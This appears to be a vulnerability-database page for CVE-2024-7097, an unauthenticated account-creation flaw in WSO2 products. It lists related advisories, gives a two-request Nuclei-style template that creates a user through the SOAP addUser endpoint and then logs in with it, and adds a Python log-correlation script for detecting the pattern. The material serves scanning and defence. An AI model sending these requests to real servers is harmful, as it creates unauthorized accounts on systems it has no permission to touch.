| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-7097 | 15 Jan 2025 12:42 | – | circl |
| Security vulnerability in multiple WSO2 products | 30 May 2025 00:00 | – | cnnvd |
| CVE-2024-7097 | 30 May 2025 15:04 | – | cve |
| CVE-2024-7097 Incorrect Authorization in Multiple WSO2 Products via SOAP Admin Service Allowing Unauthorized User Signup | 30 May 2025 15:04 | – | cvelist |
| EUVD-2025-16505 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2024-7097 | 30 May 2025 15:15 | – | nvd |
| PT-2025-3690 | 14 Jan 2025 00:00 | – | ptsecurity |
| CVE-2024-7097 | 1 Jun 2025 15:36 | – | redhatcve |
| VulnCheck KEV: CVE-2024-7097 | 2 Feb 2025 00:00 | – | vulncheck_kev |
| CVE-2024-7097 Incorrect Authorization in Multiple WSO2 Products via SOAP Admin Service Allowing Unauthorized User Signup | 30 May 2025 15:04 | – | vulnrichment |
```yaml
id: CVE-2024-7097

info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
  impact: |
    Unauthenticated attackers can bypass self-registration restrictions to create arbitrary user accounts, potentially gaining unauthorized access to the WSO2 system and its resources.
  remediation: |
    Apply security patches from WSO2 as outlined in security advisory WSO2-2024-3574 to address the arbitrary account creation vulnerability.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  classification:
    epss-score: 0.0054
    epss-percentile: 0.41271
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev,vuln

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
  # Step 1: call the self-registration SOAP endpoint; a 202 means the
  # account was accepted without any prior authentication.
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:xsd="http://org.apache.axis2/xsd">
          <soapenv:Header/>
          <soapenv:Body>
            <xsd:addUser>
              <xsd:user>
                <xsd:userName>{{username}}</xsd:userName>
                <xsd:password>{{password}}</xsd:password>
              </xsd:user>
            </xsd:addUser>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: status
        status:
          - 202
        internal: true

  # Step 2: confirm the account exists by logging in with the same credentials.
  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:aut="http://authentication.services.core.carbon.wso2.org">
          <soapenv:Header/>
          <soapenv:Body>
            <aut:login>
              <aut:username>{{username}}</aut:username>
              <aut:password>{{password}}</aut:password>
            </aut:login>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        words:
          - "loginResponse"
          - "<ns:return>true</ns:return>"
        condition: and
# digest: 490a0046304402204d5861a8a3df58260d4e1abaf5f8c371e4446d8892c521c43b331ae803c7e078022007a1e3c92394eb6243bc2f069686bf1d9857c0c22fc8ff534d029836fd2b60f1:922c64590222798bb761d5b6d8e72950
```
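The template above checks for the flaw with two requests: an unauthenticated `addUser` call to `UserRegistrationAdminService` answered with HTTP 202, then a login against `AuthenticationAdmin` with the same credentials. The same two-step pattern is what a defender can look for in front-end access logs. The following detection script is an added example, not part of the template or of WSO2's tooling; it assumes a constructed log format (timestamp, client IP, method, path, status per line) and a 10-minute correlation window.

```python
"""Correlate WSO2 SOAP admin-service requests that mirror the two-step
CVE-2024-7097 check: a 202 from the self-registration endpoint followed
by an AuthenticationAdmin login from the same client."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format (an assumption, not WSO2's default layout):
# "<ISO timestamp> <client ip> <method> <path> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)
SIGNUP_PATH = "/services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/"
LOGIN_PATH = "/services/AuthenticationAdmin"

def parse(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["status"] = int(rec["status"])
    return rec

def find_signup_then_login(lines, window=timedelta(minutes=10)):
    """Return (ip, signup_ts, login_ts) for every client that received a 202
    from the self-registration SOAP endpoint and then authenticated within
    `window`. A login with no preceding signup from that IP is not reported."""
    signups = defaultdict(list)
    hits = []
    for rec in filter(None, map(parse, lines)):
        if rec["method"] != "POST":
            continue
        if rec["path"] == SIGNUP_PATH and rec["status"] == 202:
            signups[rec["ip"]].append(rec["ts"])
        elif rec["path"] == LOGIN_PATH:
            for t in signups[rec["ip"]]:
                if timedelta(0) <= rec["ts"] - t <= window:
                    hits.append((rec["ip"], t, rec["ts"]))
                    break
    return hits

# Constructed sample log: one client completes both steps, another only logs in.
SAMPLE_LOG = [
    "2025-01-15T12:40:01 203.0.113.7 POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ 202",
    "2025-01-15T12:40:03 203.0.113.7 POST /services/AuthenticationAdmin 200",
    "2025-01-15T12:41:00 198.51.100.9 POST /services/AuthenticationAdmin 200",
    "2025-01-15T12:45:00 198.51.100.9 GET /carbon/admin/login.jsp 200",
]

if __name__ == "__main__":
    for ip, s, l in find_signup_then_login(SAMPLE_LOG):
        print(f"{ip}: self-registration at {s:%H:%M:%S}, login at {l:%H:%M:%S}")
```

On a patched deployment the signup request should no longer return 202 for an unauthenticated caller, so a hit after patching is worth investigating as a regression or a missed node.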